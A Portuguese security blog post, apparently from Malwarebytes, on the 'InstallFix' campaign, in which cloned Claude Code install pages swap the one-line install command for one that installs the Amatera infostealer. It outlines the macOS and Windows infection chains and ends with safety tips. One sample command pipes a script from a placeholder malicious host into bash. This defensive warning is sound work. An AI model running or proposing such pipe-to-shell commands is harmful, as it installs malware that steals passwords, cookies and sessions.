Os atacantes estão a clonar páginas de instalação de ferramentas populares, como o Claude Code, e a trocar os comandos de instalação de uma linha por malware, principalmente para roubar palavras-passe, cookies, sessões e acesso a ambientes de desenvolvimento.
Os guias de instalação modernos geralmente orientam a copiar um único comando, como curl https://malware-site | bash no seu terminal e pressione Enter. Esse hábito transforma o site num controlo remoto: qualquer script que exista nesse URL é executado com as suas permissões, geralmente as de um administrador.
Os investigadores descobriram que os invasores abusam desse fluxo de trabalho mantendo tudo idêntico, alterando apenas o local ao qual essa linha de código realmente se conecta. Para muitos utilizadores não especialistas que acabaram de começar a usar IA e ferramentas de desenvolvimento, esse método parece normal, então eles baixam a guarda.
Mas isso basicamente se resume a «Eu confio neste domínio», e isso não é uma boa ideia, a menos que tenha certeza de que ele é confiável.
Normalmente, acontece assim. Alguém pesquisa «Claude Code install» ou «Claude Code CLI», vê um resultado patrocinado no topo com um URL plausível e clica sem pensar muito.
Mas esse anúncio leva a uma página de documentação ou download clonada: mesmo logótipo, mesma barra lateral, mesmo texto e um botão «copiar» familiar ao lado do comando de instalação. Em muitos casos, qualquer outro link em que clica nessa página falsa redireciona-o discretamente para o site real do fornecedor, de modo que nada mais parece suspeito.
Semelhante aos ataques ClickFix, este método é chamado InstallFix. O utilizador executa o código que infecta a sua própria máquina, sob falsos pretextos, e a carga útil geralmente é um infostealer.
A principal carga útil nestes casos do InstallFix com o tema Claude Code é um infostealer chamado Amatera. Ele concentra-se em dados do navegador, como palavras-passe guardadas, cookies, tokens de sessão, dados de preenchimento automático e informações gerais do sistema que ajudam os atacantes a criar um perfil do dispositivo. Com isso, eles podem sequestrar sessões da Web e iniciar sessão em painéis da nuvem e painéis administrativos internos sem precisar da sua palavra-passe real. Alguns relatórios também mencionam um interesse em carteiras de criptomoedas e outras contas de alto valor.
Windows Mac
A campanha baseada no Claude Code que os investigadores descobriram estava equipada para atingir Mac Windows Mac .
No macOS, o comando malicioso geralmente extrai um script de segunda fase de um domínio controlado pelo invasor, muitas vezes ofuscado com base64 para parecer ruidoso, mas inofensivo à primeira vista. Esse script então descarrega e executa um binário de outro domínio, removendo atributos e tornando-o executável antes de iniciá-lo.
No Windows, o comando foi visto a gerar cmd.exe, que então chama mshta.exe com um URL remoto. Isso permite que a lógica do malware seja executada como um binário confiável da Microsoft, em vez de um executável aleatório óbvio. Em ambos os casos, nada de espetacular aparece na tela: você pensa que acabou de instalar uma ferramenta, enquanto a carga útil real começa silenciosamente a fazer o seu trabalho em segundo plano.
Como se manter seguro
Com o ClickFix e o InstallFix a espalharem-se rapidamente — e não parece que vão desaparecer tão cedo —, é importante estar atento, ter cuidado e proteger-se.
- Vá com calma. Nãose apresse em seguir as instruções de uma página da Web ou prompt, especialmente se elas solicitarem que execute comandos no seu dispositivo ou copie e cole código. Analise o que o comando fará antes de executá-lo.
- Evite executar comandos ou scripts de fontes não confiáveis. Nuncaexecute códigos ou comandos copiados de sites, e-mails ou mensagens, a menos que confie na fonte e compreenda o objetivo da ação. Verifique as instruções de forma independente. Se um site solicitar que execute um comando ou realize uma ação técnica, verifique a documentação oficial ou entre em contacto com o suporte antes de prosseguir.
- Limite o uso de copiar e colar para comandos.Digitar manualmenteos comandos em vez de copiar e colar pode reduzir o risco de executar inadvertidamente cargas maliciosas ocultas no texto copiado.
- Proteja os seus dispositivos. Utilizeumasolução antimalwareatualizada e em tempo real com um componente de proteção da Web.
- Informe-se sobre as técnicas de ataque em constante evolução.Compreender que os ataques podem vir de vetores inesperados e evoluir ajuda a manter a vigilância. Continue a ler o nosso blog!
Dica profissional:sabia que o programa gratuito Malwarebytes Browser Guard avisa quando um site tenta copiar algo para a sua área de transferência?
Não nos limitamos a comunicar as ameaças - eliminamo-las
Os riscos de cibersegurança nunca se devem propagar para além de uma manchete. Mantenha as ameaças longe dos seus dispositivos descarregando Malwarebytes hoje mesmo.
